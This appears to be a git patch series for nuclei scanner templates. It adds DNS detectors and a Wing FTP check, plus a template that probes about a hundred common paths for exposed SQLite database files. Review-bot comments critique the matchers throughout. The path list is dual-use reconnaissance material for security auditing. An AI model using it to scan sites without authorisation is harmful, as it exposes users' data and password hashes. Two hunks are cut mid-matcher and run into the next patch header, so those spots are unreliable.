From 183277a771f53f32704767cd4a0e6b0b1eb561bd Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 24 Feb 2024 14:28:56 +0000 Subject: [PATCH 01/86] spf record detection template --- dns/spf-record-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 dns/spf-record-detect.yaml diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml new file mode 100644 index 0000000000..3dca6d7520 --- /dev/null +++ b/dns/spf-record-detect.yaml @@ -0,0 +1,23 @@ +id: spf-record + +info: + name: SPF Record Detected + author: rxerium + severity: info + description: An SPF TXT record was detected + reference: + - https://www.mimecast.com/content/how-to-create-an-spf-txt-record + tags: dns,spf + +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=spf1" + + extractors: + - type: regex + regex: + - "v=spf1(.+)" \ No newline at end of file From 51b06a5756890f2334b2147102b9d65ae759c6f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Mar 2024 09:56:31 +0530 Subject: [PATCH 02/86] fix-formatting --- dns/spf-record-detect.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index 3dca6d7520..c5583ab23a 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -1,10 +1,11 @@ -id: spf-record +id: spf-record-detect info: - name: SPF Record Detected + name: SPF Record - Detection author: rxerium severity: info - description: An SPF TXT record was detected + description: | + An SPF TXT record was detected reference: - https://www.mimecast.com/content/how-to-create-an-spf-txt-record tags: dns,spf @@ -20,4 +21,4 @@ dns: extractors: - type: regex regex: - - "v=spf1(.+)" \ No newline at end of file + - "v=spf1(.+)" From 746631b37ffba4c0a9f897567b7ff06d61f79a9e Mon Sep 17 00:00:00 2001 
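Review bot: The `v=spf1` word matcher in the new dns/spf-record-detect.yaml accepts that substring anywhere in the response, while RFC 7208 §4.5 only treats a TXT record as SPF when it begins with the version section `v=spf1` followed by a space or the end of the record; a record starting `v=spf10`, or a TXT string that merely quotes SPF syntax, would also be reported as detected. A regex matcher such as `- type: regex` / `regex:` / `- 'v=spf1( |"|$)'` is closer to the spec (the `"` alternative assumes nuclei prints TXT strings quoted in the raw answer — confirm). The extractor regex `v=spf1(.+)` has the same looseness, and the template declares no `metadata: max-request: 1`, which the other DNS templates in this series do.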
From: Michal Mikolas Date: Wed, 13 Mar 2024 12:51:16 +0100 Subject: [PATCH 03/86] generic-db: Added checking of SQLite database files exposure. --- http/exposures/files/generic-db.yaml | 151 +++++++++++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 http/exposures/files/generic-db.yaml diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml new file mode 100644 index 0000000000..a464ea071e --- /dev/null +++ b/http/exposures/files/generic-db.yaml 
@@ -0,0 +1,151 @@ +id: generic-db + +info: + name: Generic DB file exposure + author: Michal Mikolas (nanuqcz) + severity: high + description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + reference: + - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite + - https://laravel.com/docs/5.2/database # database/database.sqlite + - https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite + - https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3 + - https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db + - https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db + - https://symfony.com/doc/2.x/doctrine.html # sqlite.db + - https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite + - https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite + - https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3 + - https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3 + - https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3 + - https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3 + - https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite + - https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite + - 
https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite + - https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite + - https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite + - https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite + - https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db + - https://stackoverflow.com/a/37088960/1632572 # application/database/data.db + - https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db + - https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite + - https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db + - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db + - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite + - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + metadata: + verified: true + tags: database,exposure,sqlite,sqlite3 + +http: + - method: GET + path: + # Recommended paths found in framework official docs or unofficial tutorials + - "{{BaseURL}}/database/database.sqlite" + - "{{BaseURL}}/database/production.sqlite" + - "{{BaseURL}}/app/database/production.sqlite" + - "{{BaseURL}}/writable/db.sqlite3" + - "{{BaseURL}}/writable/database.db" + - "{{BaseURL}}/var/app.db" + - "{{BaseURL}}/var/data/db.sqlite" + - "{{BaseURL}}/var/data/data.sqlite" + - "{{BaseURL}}/app/sqlite.db" + - "{{BaseURL}}/sqlite.db" + - "{{BaseURL}}/db.sqlite3" + - 
"{{BaseURL}}/db/production.sqlite3" + - "{{BaseURL}}/db.sqlite" + - "{{BaseURL}}/mydb.sqlite" + - "{{BaseURL}}/app/data/app_db.sqlite" + - "{{BaseURL}}/app/webroot/database.sqlite" + - "{{BaseURL}}/app/database.sqlite" + - "{{BaseURL}}/application/databases/db.sqlite" + - "{{BaseURL}}/application/db/database.sqlite" + - "{{BaseURL}}/application/Database/db1.db" + - "{{BaseURL}}/application/database/data.db" + - "{{BaseURL}}/data/app.db" + - "{{BaseURL}}/data/sqlite.db" + - "{{BaseURL}}/data/sqlite3.db" + - "{{BaseURL}}/data/database.db" + - "{{BaseURL}}/data/production.db" + - "{{BaseURL}}/storage/database/database.sqlite" + - "{{BaseURL}}/protected/data/app.db" + - "{{BaseURL}}/protected/data/sqlite.db" + - "{{BaseURL}}/protected/data/sqlite3.db" + - "{{BaseURL}}/protected/data/database.db" + - "{{BaseURL}}/protected/data/production.db" + - "{{BaseURL}}/db/database.db" + - "{{BaseURL}}/db/database.sqlite" + - "{{BaseURL}}/app/Model/app.db" + - "{{BaseURL}}/app/Model/sqlite.db" + - "{{BaseURL}}/app/Model/sqlite3.db" + - "{{BaseURL}}/app/Model/database.db" + - "{{BaseURL}}/app/Model/production.db" + + # General paths + - "{{BaseURL}}/app.db" + - "{{BaseURL}}/sqlite3.db" + - "{{BaseURL}}/app.sqlite" + - "{{BaseURL}}/app.sqlite3" + - "{{BaseURL}}/database.db" + - "{{BaseURL}}/database.sqlite" + - "{{BaseURL}}/database.sqlite3" + - "{{BaseURL}}/production.db" + - "{{BaseURL}}/production.sqlite" + - "{{BaseURL}}/production.sqlite3" + - "{{BaseURL}}/db/db.sqlite" + - "{{BaseURL}}/db/db.sqlite3" + - "{{BaseURL}}/db/sqlite.db" + - "{{BaseURL}}/db/sqlite3.db" + - "{{BaseURL}}/db/app.db" + - "{{BaseURL}}/db/app.sqlite" + - "{{BaseURL}}/db/app.sqlite3" + - "{{BaseURL}}/db/database.sqlite3" + - "{{BaseURL}}/db/production.db" + - "{{BaseURL}}/db/production.sqlite" + - "{{BaseURL}}/app/db.sqlite" + - "{{BaseURL}}/app/db.sqlite3" + - "{{BaseURL}}/app/sqlite3.db" + - "{{BaseURL}}/app/app.db" + - "{{BaseURL}}/app/app.sqlite" + - "{{BaseURL}}/app/app.sqlite3" + - 
"{{BaseURL}}/app/database.db" + - "{{BaseURL}}/app/database.sqlite3" + - "{{BaseURL}}/app/production.db" + - "{{BaseURL}}/app/production.sqlite" + - "{{BaseURL}}/app/production.sqlite3" + - "{{BaseURL}}/data/db.sqlite" + - "{{BaseURL}}/data/db.sqlite3" + - "{{BaseURL}}/data/app.sqlite" + - "{{BaseURL}}/data/app.sqlite3" + - "{{BaseURL}}/data/database.sqlite" + - "{{BaseURL}}/data/database.sqlite3" + - "{{BaseURL}}/data/production.sqlite" + - "{{BaseURL}}/data/production.sqlite3" + - "{{BaseURL}}/database/db.sqlite" + - "{{BaseURL}}/database/db.sqlite3" + - "{{BaseURL}}/database/sqlite.db" + - "{{BaseURL}}/database/sqlite3.db" + - "{{BaseURL}}/database/app.db" + - "{{BaseURL}}/database/app.sqlite" + - "{{BaseURL}}/database/app.sqlite3" + - "{{BaseURL}}/database/database.db" + - "{{BaseURL}}/database/database.sqlite3" + - "{{BaseURL}}/database/production.db" + - "{{BaseURL}}/database/production.sqlite3" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + negative: true + words: + - " Date: Fri, 15 Mar 2024 18:15:11 +0530 Subject: [PATCH 04/86] Create wing-ftp-service-detect.yaml --- .../technologies/wing-ftp-service-detect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/technologies/wing-ftp-service-detect.yaml diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..0e444d1079 --- /dev/null +++ b/http/technologies/wing-ftp-service-detect.yaml 
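Review bot: The request block in the new http/exposures/files/generic-db.yaml sends on the order of a hundred GET paths per host with no `stop-at-first-match: true`, and with `matchers-condition: and` on status 200 plus a negative body word, a host that answers 200 to every unknown path yields one finding per path. Adding `stop-at-first-match: true` under the request and `max-request: <path count>` under `metadata` (the other templates in this series declare `max-request`) would keep both output volume and request count predictable. The tail of this hunk is garbled in this rendering, so the value of the trailing negative `words` matcher could not be reviewed.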
@@ -0,0 +1,24 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + max-request: 1 + verified: true + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" From 30b2cc145bd81a8db4a8d485064086264682cf19 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:20:38 +0000 Subject: [PATCH 05/86] txt service detector --- dns/txt-service-detector.yaml | 218 ++++++++++++++++++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 dns/txt-service-detector.yaml diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml new file mode 100644 index 0000000000..2d35ce1e51 --- /dev/null +++ b/dns/txt-service-detector.yaml 
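Review bot: The `description` in the new http/technologies/wing-ftp-service-detect.yaml explains what FTP is in general rather than what the template checks; the only matcher looks for `Wing FTP Server` in a response header, so `Wing FTP Server was detected via its HTTP response headers.` would document the actual behaviour. If that header also carries a version string (not visible here — confirm against a live response), a regex extractor on `part: header` would make the finding usable for vulnerability correlation.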
@@ -0,0 +1,218 @@ +id: txt-service-detector + +info: + name: DNS TXT Service Detector + author: rxerium + severity: info + description: Template to detect services associated with a domain through TXT records. + reference: + - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + metadata: + max-request: 1 + tags: dns,txt + +dns: + - name: "{{FQDN}}" + type: TXT + + matchers-condition: or + matchers: + - type: word + name: "Keybase" + words: + - "keybase-site-verification" + + - type: word + name: "Proton Mail" + words: + - "protonmail-verification" + + - type: word + name: "Webex" + words: + - "webexdomainverification" + + - type: word + name: "Apple" + words: + - "apple-domain-verification" + + - type: word + name: "Facebook" + words: + - "facebook-domain-verification" + + - type: word + name: "Autodesk" + words: + - "autodesk-domain-verification" + + - type: word + name: "Stripe" + words: + - "stripe-verification" + + - type: word + name: "Atlassian" + words: + - "atlassian-domain-verification" + + - type: word + name: "Adobe Sign" + words: + - "adobe-sign-verification" + + - type: word + name: "Zoho" + words: + - "zoho-verification" + + - type: word + name: "Have I been Pwned" + words: + - "have-i-been-pwned-verification" + + - type: word + name: "KnowBe4" + words: + - "knowbe4-site-verification" + + - type: word + name: "Jamf" + words: + - "jamf-site-verification" + + - type: word + name: "Parallels" + words: + - "parallels-domain-verification" + + - type: word + name: "Dropbox" + words: + - "dropbox-domain-verification" + + - type: word + name: "VMWare Cloud" + words: + - "vmware-cloud-verification" + + - type: word + name: "Canva" + words: + - "canva-site-verification" + + - type: word + name: "MongoDB" + words: + - "mongodb-site-verification" + + - type: word + name: "Slack" + words: + - "slack-domain-verification" + + - type: word + name: "TeamViewer" + words: + - "teamviewer-sso-verification" + + - type: word + name: 
"Bugcrowd" + words: + - "bugcrowd-verification" + + - type: word + name: "Cisco" + words: + - "cisco-site-verification" + + - type: word + name: "Palo Alto Networks" + words: + - "paloaltonetworks-site-verification" + + - type: word + name: "Twilio" + words: + - "twilio-domain-verification" + + - type: word + name: "Dell Technologies" + words: + - "dell-technologies-domain-verification" + + - type: word + name: "1password" + words: + - "1password-site-verification" + + - type: word + name: "Duo" + words: + - "duo_sso_verification" + + - type: word + name: "Sophos" + words: + - "sophos-domain-verification" + + - type: word + name: "Pinterest" + words: + - "pinterest-site-verification" + + - type: word + name: "Citrix" + words: + - "citrix-verification-code" + + - type: word + name: "Zapier" + words: + - "zapier-domain-verification-challenge" + + - type: word + name: "Uber" + words: + - "uber-domain-verification" + + - type: word + name: "Zoom" + words: + - "zoom-domain-verification" + + - type: word + name: "Lastpass" + words: + - "lastpass-verification-code" + + - type: word + name: "Google Workspace" + words: + - "google-site-verification" + + - type: word + name: "Flexera" + words: + - "flexera-domain-verification" + + - type: word + name: "Yandex" + words: + - "yandex-verification" + + - type: word + name: "Calendly" + words: + - "calendly-site-verification" + + - type: word + name: "Docusign" + words: + - "docusign" + + - type: word + name: "Whimsical" + words: + - "whimsical" \ No newline at end of file From 2c9eae17f4a063c33d0bb43fa96f3981e9cf8077 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:26:20 +0000 Subject: [PATCH 06/86] remove trailing spaces --- dns/txt-service-detector.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 2d35ce1e51..55ea7d2e11 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml 
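Review bot: The last two matchers in the new dns/txt-service-detector.yaml use the bare words `docusign` and `whimsical`, unlike every other entry which matches a `*-verification`-style token, so any TXT string containing those substrings (an SPF `include:` naming a docusign mail host, for example) is reported as a verification record. If the verification records use a `docusign=` / `whimsical=` prefix, as I believe the DocuSign one does, `- "docusign="` and `- "whimsical="` would tighten this; otherwise a one-line comment stating why the bare word is intended would help the next maintainer.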
@@ -101,7 +101,7 @@ dns: name: "Canva" words: - "canva-site-verification" - + - type: word name: "MongoDB" words: @@ -151,7 +151,7 @@ dns: name: "Duo" words: - "duo_sso_verification" - + - type: word name: "Sophos" words: @@ -201,7 +201,7 @@ dns: name: "Yandex" words: - "yandex-verification" - + - type: word name: "Calendly" words: From d95c5384653fbc8355995a5355f90bdc82b076a6 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:28:54 +0000 Subject: [PATCH 07/86] remove another trailing space --- dns/txt-service-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 55ea7d2e11..24aa069286 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml @@ -4,7 +4,7 @@ info: name: DNS TXT Service Detector author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: Template to detect services associated with a domain through TXT records. reference: - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com metadata: From 39ad0b0f680f302a6a823e9f49fe64956fbd694f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:54:28 +0000 Subject: [PATCH 08/86] soa-detection --- dns/soa-detect.yaml | 79 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 dns/soa-detect.yaml diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml new file mode 100644 index 0000000000..d2fef30649 --- /dev/null +++ b/dns/soa-detect.yaml 
@@ -0,0 +1,79 @@ +id: soa-detect + +info: + name: SOA record service detection + author: rxerium + severity: info + description: Detects which domain provider a domain is using, detected through SOA records + reference: + - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ + metadata: + max-request: 1 + tags: dns,soa + +dns: + - name: "{{FQDN}}" + type: SOA + matchers-condition: or + matchers: + - type: word + name: "Cloudflare" + words: + - "dns.cloudflare.com" + + - type: word + name: "Amazon Web Services" + words: + - "awsdns" + + - type: word + name: "Akamai" + words: + - "hostmaster.akamai.com" + + - type: word + name: "Azure" + words: + - "azure-dns.com" + + - type: word + name: "NS1" + words: + - "nsone.net" + + - type: word + name: "Verizon" + words: + - "verizon.com" + + - type: word + name: "Google Cloud Platform" + words: + - "googledomains.com" + - "google.com" + + - type: word + name: "Alibaba" + words: + - "alibabadns.com" + + - type: word + name: "Safeway" + words: + - "safeway.com" + + - type: word + name: "Mark Monitor" + words: + - "markmonitor.com" + - "markmonitor.zone" + + - type: word + name: "Hetznet" + words: + - "hetzner.com" + + - type: word + name: "Edge Cast" + words: + - "edgecastdns.net" \ No newline at end of file From d81a235f973842fee38c116721cf5b691728f08c Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Mon, 18 Mar 2024 21:37:49 +0100 Subject: [PATCH 09/86] generic-db: Added more exact matchers to make sure the exposured file is really SQLite file. --- http/exposures/files/generic-db.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index a464ea071e..f1f4d041b6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml 
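Review bot: Several word matchers in the new dns/soa-detect.yaml are plain substrings that do not identify a DNS provider: `google.com` under `Google Cloud Platform` matches any SOA whose RNAME mailbox is at google.com (Google's own zones included), and `verizon.com` / `safeway.com` likewise match the zone owner's mailbox rather than a hosting provider. If the intent is Cloud DNS, the more specific `cloud-dns-hostmaster.google.com` (as I recall its RNAME — confirm) alongside the existing `googledomains.com` would suffice, and a comment should state what the `Safeway` entry is meant to detect. The matcher name `"Hetznet"` looks like a typo for `Hetzner` (`name: "Hetzner"`); the formatting commit later in this series (`[PATCH 11/86]`) keeps it as `hetznet`.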
@@ -35,6 +35,8 @@ info: - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + - https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}" + - https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -144,8 +146,14 @@ http: status: - 200 + # SQLite file always starts with "SQLite format {sqlite_version}" - type: word part: body - negative: true words: - - " Date: Mon, 18 Mar 2024 22:51:49 +0100 Subject: [PATCH 10/86] generic-db: Improved SQLite file signature matcher to match exactly beginning of the document. --- http/exposures/files/generic-db.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index f1f4d041b6..811540a3c6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -147,10 +147,9 @@ http: - 200 # SQLite file always starts with "SQLite format {sqlite_version}" - - type: word - part: body - words: - - "SQLite format " + - type: dsl + dsl: + - 'startswith(body, "SQLite format ")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - type: word From cf48f45e13aedd538df34c5033f390dca36b7c9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:27:34 +0530 Subject: [PATCH 11/86] formatting --- dns/soa-detect.yaml | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index d2fef30649..eb6eda0782 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml 
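Review bot: The comment `# SQLite file always starts with "SQLite format {sqlite_version}"` (added in the matchers hunk of `[PATCH 09/86]`, repeated in its reference list and carried as context into `[PATCH 10/86]`) misstates the signature: per the linked fileformat.html page every SQLite database begins with the 16 bytes `SQLite format 3` followed by a NUL, where `3` is the file-format number, not the library version. The `[PATCH 10/86]` DSL matcher can therefore be tightened to `- 'startswith(body, "SQLite format 3")'` and the comment corrected to `# SQLite database files begin with the 16-byte header "SQLite format 3" + NUL`. The tail of the PATCH 09 matchers hunk is garbled in this rendering, so the rest of its matcher changes could not be reviewed.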
@@ -1,79 +1,83 @@ id: soa-detect info: - name: SOA record service detection + name: SOA Record Service - Detection author: rxerium severity: info - description: Detects which domain provider a domain is using, detected through SOA records + description: | + Detects which domain provider a domain is using, detected through SOA records reference: - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ metadata: max-request: 1 + verified: true tags: dns,soa dns: - name: "{{FQDN}}" + type: SOA + matchers-condition: or matchers: - type: word - name: "Cloudflare" + name: "cloudflare" words: - "dns.cloudflare.com" - type: word - name: "Amazon Web Services" + name: "amazon-web-services" words: - "awsdns" - type: word - name: "Akamai" + name: "akamai" words: - "hostmaster.akamai.com" - type: word - name: "Azure" + name: "azure" words: - "azure-dns.com" - type: word - name: "NS1" + name: "ns1" words: - "nsone.net" - type: word - name: "Verizon" + name: "verizon" words: - "verizon.com" - type: word - name: "Google Cloud Platform" + name: "google-cloud-platform" words: - "googledomains.com" - "google.com" - type: word - name: "Alibaba" + name: "alibaba" words: - "alibabadns.com" - type: word - name: "Safeway" + name: "safeway" words: - "safeway.com" - type: word - name: "Mark Monitor" + name: "mark-monitor" words: - "markmonitor.com" - "markmonitor.zone" - type: word - name: "Hetznet" + name: "hetznet" words: - "hetzner.com" - type: word - name: "Edge Cast" + name: "edge-cast" words: - - "edgecastdns.net" \ No newline at end of file + - "edgecastdns.net" From cc690eb154d87f11a784f7f285af2df2504ed39e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:37:00 +0530 Subject: [PATCH 12/86] fix formatting --- ...-detector.yaml => txt-service-detect.yaml} | 90 ++++++++++--------- 1 file changed, 46 insertions(+), 44 deletions(-) rename dns/{txt-service-detector.yaml => txt-service-detect.yaml} (70%) 
diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detect.yaml similarity index 70% rename from dns/txt-service-detector.yaml rename to dns/txt-service-detect.yaml index 24aa069286..d286a8d2fe 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detect.yaml @@ -1,14 +1,16 @@ -id: txt-service-detector +id: txt-service-detect info: - name: DNS TXT Service Detector + name: DNS TXT Service - Detect author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: | + Finding the services companies use via their TXT records. reference: - - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + - https://www.abenezer.ca/blog/services-companies-use-txt-records metadata: max-request: 1 + verified: true tags: dns,txt dns: 
@@ -18,127 +20,127 @@ dns: matchers-condition: or matchers: - type: word - name: "Keybase" + name: "keybase" words: - "keybase-site-verification" - type: word - name: "Proton Mail" + name: "proton-mail" words: - "protonmail-verification" - type: word - name: "Webex" + name: "webex" words: - "webexdomainverification" - type: word - name: "Apple" + name: "apple" words: - "apple-domain-verification" - type: word - name: "Facebook" + name: "facebook" words: - "facebook-domain-verification" - type: word - name: "Autodesk" + name: "autodesk" words: - "autodesk-domain-verification" - type: word - name: "Stripe" + name: "stripe" words: - "stripe-verification" - type: word - name: "Atlassian" + name: "atlassian" words: - "atlassian-domain-verification" - type: word - name: "Adobe Sign" + name: "adobe-sign" words: - "adobe-sign-verification" - type: word - name: "Zoho" + name: "zoho" words: - "zoho-verification" - type: word - name: "Have I been Pwned" + name: "have-i-been-pwned" words: - "have-i-been-pwned-verification" - type: word - name: "KnowBe4" + name: "knowbe4" words: - "knowbe4-site-verification" - type: word - name: "Jamf" + name: "jamf" words: - "jamf-site-verification" - type: word - name: "Parallels" + name: "parallels" words: - "parallels-domain-verification" - type: word - name: "Dropbox" + name: "dropbox" words: - "dropbox-domain-verification" - type: word - name: "VMWare Cloud" + name: "vmware-cloud" words: - "vmware-cloud-verification" - type: word - name: "Canva" + name: "canva" words: - "canva-site-verification" - type: word - name: "MongoDB" + name: "mongodb" words: - "mongodb-site-verification" - type: word - name: "Slack" + name: "slack" words: - "slack-domain-verification" - type: word - name: "TeamViewer" + name: "teamViewer" words: - "teamviewer-sso-verification" - type: word - name: "Bugcrowd" + name: "bugcrowd" words: - "bugcrowd-verification" - type: word - name: "Cisco" + name: "cisco" words: - "cisco-site-verification" - type: word - name: 
"Palo Alto Networks" + name: "palo-alto-networks" words: - "paloaltonetworks-site-verification" - type: word - name: "Twilio" + name: "twilio" words: - "twilio-domain-verification" - type: word - name: "Dell Technologies" + name: "dell-technologies" words: - "dell-technologies-domain-verification" @@ -148,71 +150,71 @@ dns: - "1password-site-verification" - type: word - name: "Duo" + name: "duo" words: - "duo_sso_verification" - type: word - name: "Sophos" + name: "sophos" words: - "sophos-domain-verification" - type: word - name: "Pinterest" + name: "pinterest" words: - "pinterest-site-verification" - type: word - name: "Citrix" + name: "citrix" words: - "citrix-verification-code" - type: word - name: "Zapier" + name: "zapier" words: - "zapier-domain-verification-challenge" - type: word - name: "Uber" + name: "uber" words: - "uber-domain-verification" - type: word - name: "Zoom" + name: "zoom" words: - "zoom-domain-verification" - type: word - name: "Lastpass" + name: "lastpass" words: - "lastpass-verification-code" - type: word - name: "Google Workspace" + name: "google-workspace" words: - "google-site-verification" - type: word - name: "Flexera" + name: "flexera" words: - "flexera-domain-verification" - type: word - name: "Yandex" + name: "yandex" words: - "yandex-verification" - type: word - name: "Calendly" + name: "calendly" words: - "calendly-site-verification" - type: word - name: "Docusign" + name: "docusign" words: - "docusign" - type: word - name: "Whimsical" + name: "whimsical" words: - - "whimsical" \ No newline at end of file + - "whimsical" From b9a4f8433e18a09402165f91be334a0f56774eb6 Mon Sep 17 00:00:00 2001 
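Review bot: `name: "teamViewer"` in the second hunk of the dns/txt-service-detect.yaml rename breaks the lowercase kebab-case convention this commit applies to every other matcher name (`proton-mail`, `adobe-sign`, `vmware-cloud`); it should read `name: "teamviewer"`. Matcher names surface in output and are what users filter on, so a single mixed-case entry is easy to miss downstream.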
From: Prince Chaddha Date: Tue, 19 Mar 2024 20:50:31 +0530 Subject: [PATCH 13/86] reverted bruteforce tags to fuzz --- .nuclei-ignore | 1 - cloud/enum/azure-vm-cloud-enum.yaml | 2 +- config/bugbounty.yml | 2 +- config/pentest.yml | 2 +- config/recommended.yml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/default-logins/oracle/peoplesoft-default-login.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposures/backups/php-backup-files.yaml | 2 +- http/fuzzing/cache-poisoning-fuzz.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/prestashop-module-fuzz.yaml | 2 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-plugins-detect.yaml | 4 ++-- http/fuzzing/wordpress-themes-detect.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/fuzzing/xff-403-bypass.yaml | 2 +- http/miscellaneous/defacement-detect.yaml | 2 +- http/miscellaneous/ntlm-directories.yaml | 2 +- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 +- http/misconfiguration/gitlab/gitlab-user-enum.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- 